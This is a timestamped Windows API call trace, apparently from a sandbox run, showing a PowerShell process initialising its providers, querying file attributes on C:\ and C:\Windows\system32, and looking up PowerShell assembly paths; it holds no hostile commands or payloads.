	[0777.345] SetErrorMode (uMode=0x1) returned 0x1
	[0777.345] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccfc0 | out: lpFileInformation=0xccfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0777.345] SetErrorMode (uMode=0x1) returned 0x1
	[0777.345] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.345] SetErrorMode (uMode=0x1) returned 0x1
	[0777.346] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xccfc0 | out: lpFileInformation=0xccfc0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0777.346] SetErrorMode (uMode=0x1) returned 0x1
	[0777.346] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0777.346] SetErrorMode (uMode=0x1) returned 0x1
	[0777.346] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd060 | out: lpFileInformation=0xcd060*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0777.346] SetErrorMode (uMode=0x1) returned 0x1
	[0777.347] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0777.347] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0777.347] CoTaskMemFree (pv=0x2884c40) 
	[0777.347] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0777.347] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0777.347] CoTaskMemFree (pv=0x22e660) 
	[0777.348] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3173bf8*="FileSystem", lpRawData=0x3173988) returned 1
	[0777.349] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.349] CoTaskMemFree (pv=0x1f3620) 
	[0777.350] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0777.350] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0777.351] CoTaskMemFree (pv=0x2884c40) 
	[0777.351] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0777.351] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0777.351] CoTaskMemFree (pv=0x22e660) 
	[0777.351] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3179438*="Function", lpRawData=0x31791c8) returned 1
	[0777.352] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0777.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.353] CoTaskMemFree (pv=0x1f3620) 
	[0778.628] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0778.628] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0778.628] CoTaskMemFree (pv=0x2884c40) 
	[0778.629] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0778.629] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0778.629] CoTaskMemFree (pv=0x22e660) 
	[0778.629] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x319bc60*="Registry", lpRawData=0x319b9f0) returned 1
	[0778.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0778.843] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0778.843] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0778.843] CoTaskMemFree (pv=0x2884c40) 
	[0778.843] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0778.843] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0778.843] CoTaskMemFree (pv=0x22e660) 
	[0778.844] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x31a1078*="Variable", lpRawData=0x31a0e08) returned 1
	[0778.846] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0778.846] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.847] CoTaskMemFree (pv=0x1f3620) 
	[0778.850] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0778.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0778.850] CoTaskMemFree (pv=0x1f3620) 
	[0778.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0778.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0778.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0778.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0786.945] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0786.945] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0786.946] CoTaskMemFree (pv=0x2884c40) 
	[0786.946] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0786.946] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0786.947] CoTaskMemFree (pv=0x22e660) 
	[0786.947] ReportEventW (hEventLog=0x1b830008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2de3cc8*="Certificate", lpRawData=0x2de3a58) returned 1
	[0787.938] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.938] CoTaskMemFree (pv=0x1f3620) 
	[0787.940] CoTaskMemAlloc (cb=0x20e) returned 0x288490
	[0787.940] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x288490 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0787.940] CoTaskMemFree (pv=0x288490) 
	[0787.941] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.942] CoTaskMemFree (pv=0x1f3620) 
	[0787.942] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.942] CoTaskMemFree (pv=0x1f3620) 
	[0787.959] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.960] CoTaskMemFree (pv=0x1f3620) 
	[0787.964] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.964] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.964] CoTaskMemFree (pv=0x1f3620) 
	[0787.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.965] SetErrorMode (uMode=0x1) returned 0x1
	[0787.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0787.965] SetErrorMode (uMode=0x1) returned 0x1
	[0787.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.965] SetErrorMode (uMode=0x1) returned 0x1
	[0787.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0787.966] SetErrorMode (uMode=0x1) returned 0x1
	[0787.967] CoTaskMemAlloc (cb=0x104) returned 0x1f3620
	[0787.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0787.967] CoTaskMemFree (pv=0x1f3620) 
	[0787.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0787.971] SetErrorMode (uMode=0x1) returned 0x1
	[0787.971] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0787.971] SetErrorMode (uMode=0x1) returned 0x1
	[0787.971] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0787.972] SetErrorMode (uMode=0x1) returned 0x1
	[0787.972] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0787.972] SetErrorMode (uMode=0x1) returned 0x1
	[0787.972] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0787.972] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0787.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0787.972] SetErrorMode (uMode=0x1) returned 0x1
	[0787.972] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0787.973] SetErrorMode (uMode=0x1) returned 0x1
	[0787.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0787.973] SetErrorMode (uMode=0x1) returned 0x1
	[0787.973] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0787.973] SetErrorMode (uMode=0x1) returned 0x1
	[0787.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0787.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0787.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.974] SetErrorMode (uMode=0x1) returned 0x1
	[0787.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0787.974] SetErrorMode (uMode=0x1) returned 0x1
	[0787.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.974] SetErrorMode (uMode=0x1) returned 0x1
	[0787.974] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd070 | out: lpFileInformation=0xcd070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0787.974] SetErrorMode (uMode=0x1) returned 0x1
	[0787.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0787.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0788.947] SetErrorMode (uMode=0x1) returned 0x1
	[0788.947] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0788.947] SetErrorMode (uMode=0x1) returned 0x1
	[0788.947] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0788.947] SetErrorMode (uMode=0x1) returned 0x1
	[0788.947] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0788.947] SetErrorMode (uMode=0x1) returned 0x1
	[0788.948] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0788.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0788.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.948] SetErrorMode (uMode=0x1) returned 0x1
	[0788.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0788.948] SetErrorMode (uMode=0x1) returned 0x1
	[0788.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.948] SetErrorMode (uMode=0x1) returned 0x1
	[0788.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd0b0 | out: lpFileInformation=0xcd0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0788.949] SetErrorMode (uMode=0x1) returned 0x1
	[0788.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcceb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0788.952] SetErrorMode (uMode=0x1) returned 0x1
	[0788.952] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd370 | out: lpFileInformation=0xcd370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0788.952] SetErrorMode (uMode=0x1) returned 0x1
	[0788.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd160, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0788.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
